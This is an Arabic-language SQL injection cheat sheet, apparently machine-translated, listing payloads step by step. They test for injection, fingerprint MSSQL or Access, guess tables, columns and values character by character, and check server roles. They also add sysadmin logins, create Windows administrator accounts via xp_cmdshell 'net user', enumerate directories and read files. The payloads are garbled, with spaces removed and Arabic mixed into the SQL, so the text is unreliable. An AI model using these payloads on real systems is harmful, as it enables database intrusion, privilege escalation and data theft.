1. تحديد ما إذا كان هناك حقن
؛ و 1 = 1
؛ و 1 = 2
2. الحكم الأولي على ما إذا كان MSSQL
؛ Anduser> 0
3. معلمات الحقن هي الأحرف
'و [حالة الاستعلام] و' '='
4. لا توجد معلمات تصفية أثناء البحث
"و [حالة الاستعلام] و" ٪ 25 '='
5. Judge Database System
؛ و (selectCount (*) fromSysObjects)> 0MSSQL
؛ و (selectCount (*) frommsysObjects)> 0Access
6. تخمين قاعدة البيانات
؛ و (selectCount (*) من [اسم قاعدة البيانات])> 0
7. خمن الحقل
؛ و (SelectCount (اسم الحقل) من اسم قاعدة البيانات)> 0
8. خمن طول السجل في الحقل
؛ و (SelectTop1len (اسم الحقل) من اسم قاعدة البيانات)> 0
9. (1) خمن قيمة ASCII للحقل (الوصول)
؛ و (SelectTop1asc (Mid (اسم الحقل ، 1 ، 1)) من اسم قاعدة البيانات)> 0
(2) خمن قيمة ASCII للحقل (MSSQL)
؛ و (SelectTop1Unicode (Substring (اسم الحقل ، 1 ، 1)) من اسم قاعدة البيانات)> 0
10. بنية إذن الاختبار (MSSQL)
؛ و 1 = (selectis_srvrolemember ('sysadmin')) ؛-
؛ و 1 = (selectis_srvrolemember ('serveradmin')) ؛-
؛ و 1 = (selectis_srvrolemember ('setupadmin')) ؛-
؛ و 1 = (selectis_srvrolemember ('SecurityAdmin')) ؛-
؛ و 1 = (selectis_srvrolemember ('diskadmin')) ؛-
؛ و 1 = (selectis_srvrolemember ('bulkadmin')) ؛-
؛ و 1 = (selectis_member ('db_owner')) ؛-
11. أضف MSSQL وحساب النظام
؛ execmaster.dbo.sp_addloginusername ؛-
؛ execmaster.dbo.sp_passwordnull ، اسم المستخدم ، كلمة المرور ؛-
؛ execmaster.dbo.sp_addsrvrolembersysadminusername ؛-
؛ execmaster.dbo.xp_cmdshell'netuserusernamepassword/محطات العمل:*/مرات: all/passwordchg: نعم/passwordreq: نعم/نشط: نعم/إضافة '؛-
؛ execmaster.dbo.xp_cmdshell'netuserusernamepassword/add '؛-
؛ execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add '؛-
12. (1) نقل الدليل
؛ CreateTableDirs (Pathsvarchar (100) ، Idint)
؛ insertDirsexecmaster.dbo.xp_dirtree'c:/'
؛ و (selectTOP1PathSfromdirs)> 0
؛ و (selectTOP1PathSfromDirswherePathsnotin ('مسارات تم الحصول عليها من الخطوة السابقة')>)>)
(2) اجتياز الدليل
؛ CreateTableTemp (Idnvarchar (255) ، num1nvarchar (255) ، num2nvarchar (255) ، num3nvarchar (255)) ؛-
؛ inserttempexecmaster.dbo.xp_availablemedia ؛ -etl جميع محركات الأقراص الحالية
؛ insertintotemp (id) execmaster.dbo.xp_subdirs'c:/'؛-الحصول على قائمة الدليل الفرعي
؛ insertIntotemp (id ، num1) execmaster.dbo.xp_dirtree'c:/'؛-احصل على بنية شجرة الدليل لجميع الدلائل الفرعية
؛ insertIntotemp (id) execmaster.dbo.xp_cmdshell'typec: /web/index.asp '؛-عرض محتوى الملف
